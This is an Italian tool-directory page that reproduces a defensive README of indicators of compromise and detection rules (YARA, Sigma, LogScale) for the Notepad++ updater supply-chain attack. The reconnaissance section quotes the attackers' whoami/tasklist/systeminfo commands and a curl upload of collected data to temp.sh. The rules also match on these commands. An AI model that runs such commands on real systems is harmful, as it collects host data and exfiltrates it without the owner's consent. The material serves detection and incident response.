Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
notepadpp-supply-chain-iocs — IoC e regole di rilevamento per l'attacco alla supply chain di Notepad++ (CVE-2025-15556) — Lotus Blossom APT, giugno–dicembre 2025. Include query Falcon LogScale, regole YARA/Sigma e mappatura MITRE ATT&CK. | Kitploit
Strumenti/GitHubGitHub/renat0z3r0/notepadpp-supply-chain-iocs
Gestione degli Indicatori di Compromissione (IOC)Feed e Aggregatori di MinacceAnalisi delle VulnerabilitàInformatica ForenseAnalisi MalwareThreat IntelligenceSicurezza della Supply ChainApprendimento e FormazioneRisposta agli Incidenti

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubrenat0z3r0/notepadpp-supply-chain-iocs

notepadpp-supply-chain-iocs

IoC e regole di rilevamento per l'attacco alla supply chain di Notepad++ (CVE-2025-15556) — Lotus Blossom APT, giugno–dicembre 2025. Include query Falcon LogScale, regole YARA/Sigma e mappatura MITRE ATT&CK.

Vedi Repository
167 mesi faNon ancora revisionato
Condividi

Attacco alla Supply Chain di Notepad++ — Repository IoC

CVE-2025-15556 | Lotus Blossom / Raspberry Typhoon | Giugno – Dicembre 2025

Last Updated IoC Count License: MIT MITRE ATT&CK


Panoramica

Questo repository contiene una raccolta completa e consolidata di Indicatori di Compromissione (IoC) relativi all'attacco alla supply chain di Notepad++ divulgato il 2 febbraio 2026.

Tra giugno e dicembre 2025, un attore di minaccia sponsorizzato dallo stato cinese ha compromesso l'infrastruttura di hosting di Notepad++, dirottando il meccanismo di aggiornamento integrato (WinGUp) per distribuire selettivamente installer troianizzati a utenti mirati. L'attacco ha sfruttato la mancanza di verifica crittografica nell'aggiornatore (pre-v8.8.9), consentendo la distribuzione di backdoor personalizzate, Cobalt Strike Beacon e payload Metasploit.

Fatti chiave

CVECVE-2025-15556 — Download di codice senza verifica d'integrità
Threat ActorLotus Blossom (Bilbug, Raspberry Typhoon, Thrip) / Zirconium (Violet Typhoon)
Active PeriodGiugno 2025 – 2 Dicembre 2025
Attack VectorCompromissione della supply chain tramite aggiornatore automatico WinGUp
TargetsGoverno, telecomunicazioni, servizi finanziari, provider IT (Filippine, Vietnam, El Salvador, Australia, Asia orientale)
MalwareBackdoor Chrysalis (personalizzata), Cobalt Strike Beacon, Metasploit Meterpreter
Patched inNotepad++ v8.8.9+ (verifica certificato) / v8.9.1+ (validazione XMLDSig)

Catene di infezione

Kaspersky GReAT ha identificato tre distinte catene di infezione, ruotate approssimativamente ogni mese per eludere il rilevamento:

Catena #1 — Luglio/Agosto 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → ProShow.exe (legitimate) → exploit via "load" file
  → Metasploit downloader → Cobalt Strike Beacon
  • Abusa di una vecchia vulnerabilità nel software ProShow invece del DLL sideloading
  • Ricognizione: whoami && tasklist → esfiltrato via temp.sh
  • Directory di lavoro: %appdata%\ProShow\

Catena #2 — Settembre/Ottobre 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → script.exe (Lua interpreter) → alien.ini (compiled Lua)
  → shellcode via EnumWindowStationsW → Metasploit downloader → Cobalt Strike Beacon
  • Utilizza un interprete Lua legittimo per eseguire shellcode compilato
  • Ricognizione ampliata: whoami && tasklist && systeminfo && netstat -ano
  • Directory di lavoro: %appdata%\Adobe\Scripts\

Catena #3 — Ottobre 2025

root@kitploit:~
GUP.exe → update.exe (NSIS) → BluetoothService.exe (legitimate) → log.dll (sideloaded)
  → decrypts "BluetoothService" shellcode → Chrysalis backdoor
  • Tecnica classica di DLL sideloading
  • Nessuna ricognizione incorporata (a differenza delle catene 1 e 2)
  • Directory di lavoro: %appdata%\Bluetooth\
  • Cobalt Strike Beacon associato trovato in C:\ProgramData\USOShared\
root@kitploit:~
                     ┌─────────────────────────────────────────────────────────┐
                     │              COMPROMISE TIMELINE                        │
                     ├─────────┬─────────┬─────────┬─────────┬─────────┬──────┤
                     │  Jul 25 │  Aug 25 │  Sep 25 │  Oct 25 │  Nov 25 │Dec 25│
                     ├─────────┴─────────┴─────────┴─────────┴─────────┴──────┤
  Chain #1 (ProShow) │████████████████████                                    │
  Chain #2 (Lua)     │                    █████████████████████████████        │
  Chain #3 (DLL SL)  │                              ██████████████            │
  Infra access       │████████████████████████████████████████████████████████│
                     └────────────────────────────────────────────────────────┘

Contenuti del repository

FileDescrizione
notepadpp_supply_chain_iocs.csvDataset completo di IoC (105 indicatori) con mappatura MITRE ATT&CK

Schema CSV

ColonnaDescrizione
ioc_typeTipo: ip, domain, url, sha1, sha256, filepath, filename, useragent, behavior, cve, attribution, compromise_window
ioc_valueIl valore dell'indicatore
chainCatena di infezione (1, 2, 3, 1/2, 2/3, all, n/a)
contextDescrizione di cosa rappresenta l'IoC
sourceFonte dell'intelligence (Kaspersky, Rapid7, CrowdStrike, Tenable, Kevin Beaumont)
riskSeverità (CRITICAL, HIGH, MEDIUM, LOW, INFO)
mitre_techniqueID tecnica MITRE ATT&CK

Rilevamento e Caccia alle Minacce

Indicatori prioritari (iniziare da qui)

Comportamentali — indipendenti dagli IoC, massimo valore:

  • gup.exe che genera qualsiasi processo figlio diverso da un installer legittimo firmato di Notepad++
  • gup.exe che si connette a domini/IP diversi da notepad-plus-plus.org, github.com, release-assets.githubusercontent.com
  • Creazione di directory: %appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\
  • Creazione di %localappdata%\Temp\ns.tmp\ (runtime NSIS — presente in tutte le catene)

Rete — alta confidenza:

  • Risoluzione DNS di cdncheck.it.com, safe-dns.it.com, self-dns.it.com, api.skycloudcenter.com, api.wiresguard.com
  • Connessioni a temp.sh (51.91.79.17) — specialmente con upload di file tramite curl
  • Richieste HTTP con URL temp.sh incorporati nell'header User-Agent
  • Connessioni in uscita a 45.76.155.202, 45.32.144.255, 95.179.213.0, 45.77.31.210

Comandi di ricognizione (post-sfruttamento):

root@kitploit:~
cmd /c whoami&&tasklist > 1.txt
cmd /c "whoami&&tasklist&&systeminfo&&netstat -ano" > a.txt
curl -F "[email protected]" -s https://temp.sh/upload

Query CrowdStrike Falcon LogScale

Comportamentale: caccia ai processi figli di GUP.exe
root@kitploit:~
#event_simpleName=ProcessRollup2 event_platform=Win ParentBaseFileName="gup.exe"
| FilePath=/\\Device\\HarddiskVolume\d+(?<shortFilePath>.+$)/
| groupBy([FileName, SHA256HashData, shortFilePath, CommandLine])
Caccia multi-IoC su eventi di processo, rete e DNS
root@kitploit:~
#event_simpleName=/(ProcessRollup2|NetworkConnectIP4|DnsRequest)/ event_platform=Win
| case {
    // Malicious IPs
    RemoteAddressIP4=/(95\.179\.213\.0|61\.4\.102\.97|59\.110\.7\.32|124\.222\.137\.114|45\.76\.155\.202|45\.32\.144\.255|45\.77\.31\.210)/
        | iocType := "Malicious IP" | iocValue := RemoteAddressIP4 | riskScore := "HIGH";
    // Malicious Domains
    DomainName=/(api\.skycloudcenter\.com|api\.wiresguard\.com|cdncheck\.it\.com|safe-dns\.it\.com|self-dns\.it\.com|temp\.sh)/i
        | iocType := "Malicious Domain" | iocValue := DomainName | riskScore := "HIGH";
    // Suspicious filenames
    ImageFileName=/\\(BluetoothService|admin|system|loader1|loader2|s047t5g|ConsoleApplication2|3yzr31vk|uffhxpSy)\.exe$/i
        | iocType := "Suspicious Filename" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Suspicious DLLs
    ImageFileName=/\\(log\.dll|libtcc\.dll)$/i
        | iocType := "Suspicious DLL" | iocValue := ImageFileName | riskScore := "MEDIUM";
    // Chain-specific artifacts
    ImageFileName=/\\(alien\.ini|load)$/i
        | iocType := "Chain Artifact" | iocValue := ImageFileName | riskScore := "HIGH";
    * | iocType := null;
}
| iocType=*
| ImageFileName=/\\(?<FileName>[^\\]+)$/
| table([riskScore, iocType, iocValue, @timestamp, aid, ComputerName, FileName, ImageFileName, CommandLine, SHA256HashData, RemoteAddressIP4, DomainName], limit=5000)
Rilevamento installer NSIS (tutte le catene)
root@kitploit:~
#event_simpleName=DirectoryCreate event_platform=Win
| FilePath=/\\ns\.tmp$/i
| FilePath=/\\Temp\\ns\.tmp$/i
| groupBy([aid, ComputerName, FilePath, ContextTimeStamp], limit=5000)

Regola YARA (pattern NSIS + ricognizione)

Regola YARA per updater NSIS malevolo
root@kitploit:~
rule Notepadpp_SupplyChain_MaliciousUpdater {
    meta:
        description = "Rileva installer NSIS malevoli dall'attacco alla supply chain di Notepad++"
        author = "Renato Z3r0 ed i miei sorcini"
        date = "2026-02"
        reference = "https://securelist.com/notepad-supply-chain-attack/118708/"
        tlp = "WHITE"
        
    strings:
        $nsis = "Nullsoft.NSIS" ascii
        $recon1 = "whoami" ascii nocase
        $recon2 = "tasklist" ascii nocase
        $recon3 = "systeminfo" ascii nocase
        $recon4 = "netstat -ano" ascii nocase
        $exfil = "temp.sh/upload" ascii nocase
        $curl = "curl" ascii nocase
        $dir1 = "\\ProShow\\" ascii nocase
        $dir2 = "\\Adobe\\Scripts\\" ascii nocase
        $dir3 = "\\Bluetooth\\" ascii nocase
        
    condition:
        uint16(0) == 0x5A4D and
        $nsis and
        (2 of ($recon*) or $exfil or ($curl and 1 of ($recon*))) and
        1 of ($dir*)
}

Regole Sigma

Sigma: processo figlio sospetto di GUP.exe
root@kitploit:~
title: Notepad++ GUP.exe Suspicious Child Process
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Rileva GUP.exe (aggiornatore di Notepad++) che genera processi figli sospetti indicativi di compromissione della supply chain
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.initial_access
    - attack.t1195.002
    - cve.2025.15556
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith: '\gup.exe'
    filter_legitimate:
        Image|endswith:
            - '\npp.Installer.x64.exe'
            - '\npp.Installer.exe'
    condition: selection_parent and not filter_legitimate
falsepositives:
    - Legitimate Notepad++ installers with non-standard naming
level: high
Sigma: comandi di ricognizione con esfiltrazione via temp.sh
root@kitploit:~
title: Reconnaissance Data Exfiltration via temp.sh
id: b2c3d4e5-f6a7-8901-bcde-f12345678901
status: experimental
description: Rileva ricognizione di sistema seguita da upload di dati a temp.sh, come osservato nell'attacco alla supply chain di Notepad++
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
tags:
    - attack.exfiltration
    - attack.t1567
    - attack.discovery
    - attack.t1082
logsource:
    category: process_creation
    product: windows
detection:
    selection_curl:
        CommandLine|contains:
            - 'temp.sh/upload'
            - 'temp.sh'
        Image|endswith: '\curl.exe'
    condition: selection_curl
falsepositives:
    - Legitimate use of temp.sh file sharing service (rare in corporate environments)
level: high
Sigma: risoluzione di domini malevoli
root@kitploit:~
title: Notepad++ Supply Chain C2 Domain Resolution
id: c3d4e5f6-a7b8-9012-cdef-123456789012
status: experimental
description: Rileva risoluzione DNS di domini C2 associati all'attacco alla supply chain di Notepad++
author: Renato Z3r0 ed i miei sorcini
date: 2026/02/09
references:
    - https://securelist.com/notepad-supply-chain-attack/118708/
    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: dns_query
    product: windows
detection:
    selection:
        QueryName|endswith:
            - 'cdncheck.it.com'
            - 'safe-dns.it.com'
            - 'self-dns.it.com'
            - 'api.skycloudcenter.com'
            - 'api.wiresguard.com'
    condition: selection
falsepositives:
    - Very unlikely in corporate environments
level: critical

Mappatura MITRE ATT&CK

TatticaTecnicaIDUtilizzo in questa campagna
Accesso InizialeCompromissione della supply chain: compromettere la supply chain softwareT1195.002Meccanismo di aggiornamento WinGUp dirottato
EsecuzioneInterprete di comandi e script: Windows Command ShellT1059.003Ricognizione tramite cmd.exe
EsecuzioneInterprete di comandi e script: Python/LuaT1059.006Interprete Lua Catena #2
EsecuzioneSfruttamento per esecuzione lato clientT1203Vulnerabilità ProShow Catena #1
EsecuzioneAPI nativaT1106EnumWindowStationsW per esecuzione shellcode
PersistenzaDirottamento del flusso di esecuzione: DLL Side-LoadingT1574.002Sideloading di log.dll Catena #3
Evasione della DifesaFile o informazioni offuscatiT1027Shellcode crittografato, chiave XOR "CRAZY"
Evasione della DifesaMascheramento: abbinare nome legittimoT1036.005BluetoothService.exe, update.exe, AutoUpdater.exe
ScopertaScoperta delle informazioni di sistemaT1082whoami, systeminfo, tasklist, netstat
RaccoltaDati in staging: staging locale dei datiT1074.001Output di ricognizione salvati in file .txt
Comando e ControlloProtocollo del livello applicativo: protocolli webT1071.001

Riferimenti

FonteLink
Kaspersky GReAT — Catene di esecuzione inosservate e nuovi IoCsecurelist.com
Rapid7 — Backdoor Chrysalis: immersione nel toolkit di Lotus Blossomrapid7.com
Notifica ufficiale di Notepad++ — Aggiornamento informazioni sull'incidente di dirottamentonotepad-plus-plus.org
Kevin Beaumont — Divulgazione iniziale e attribuzioneDoublePulsar
Tenable — FAQ sulla compromissione della supply chain di Notepad++tenable.com
Orca Security — Analisi del dirottamento dell'aggiornamento e rimedioorca.security
CSO Online — Attacco alla supply chain sofisticato di APT cinesecsoonline.com

Azioni Immediate

  1. Identificare tutti gli endpoint con Notepad++ installato (qualsiasi versione < 8.9.1)
  2. Cercare gup.exe che genera processi figli inaspettati tra giugno e dicembre 2025
  3. Cercare nei log di rete connessioni ai domini C2 e IP elencati sopra
  4. Verificare la presenza di artefatti del filesystem (%appdata%\ProShow\, %appdata%\Adobe\Scripts\, %appdata%\Bluetooth\)
  5. Aggiornare Notepad++ alla v8.9.1+ utilizzando un installer scaricato manualmente dalle release ufficiali di GitHub
  6. Rimuovere eventuali vecchi certificati radice personalizzati installati da versioni precedenti di Notepad++
  7. Isolare e triage qualsiasi endpoint che mostri indicatori positivi

Registro delle modifiche

DataModifica
2026-02-09Rilascio iniziale — 105 IoC consolidati da Kaspersky, Rapid7, CrowdStrike, Tenable

Licenza

Questo repository è fornito sotto la Licenza MIT. Gli IoC sono aggregati da fonti pubbliche esclusivamente per scopi difensivi.


Contribuire

I contributi sono benvenuti. Se hai IoC aggiuntivi, regole di rilevamento o correzioni:

  1. Fare il fork del repository
  2. Aggiungere i propri indicatori al CSV (mantenendo lo schema)
  3. Inviare una pull request con riferimenti alla fonte

Disclaimer: Questo repository è destinato esclusivamente a scopi di cybersecurity difensiva. Gli IoC e le regole di rilevamento sono forniti così come sono per aiutare le organizzazioni a valutare la propria esposizione a questa compromissione della supply chain.

Scarica lo strumento
C2 HTTPS tramite Cobalt Strike, Chrysalis
Comando e ControlloCanale crittografatoT1573Configurazione crittografata CS Beacon
Comando e ControlloTrasferimento di strumenti in ingressoT1105Downloader Metasploit che recupera CS Beacon
EsfiltrazioneEsfiltrazione tramite servizio webT1567Upload a temp.sh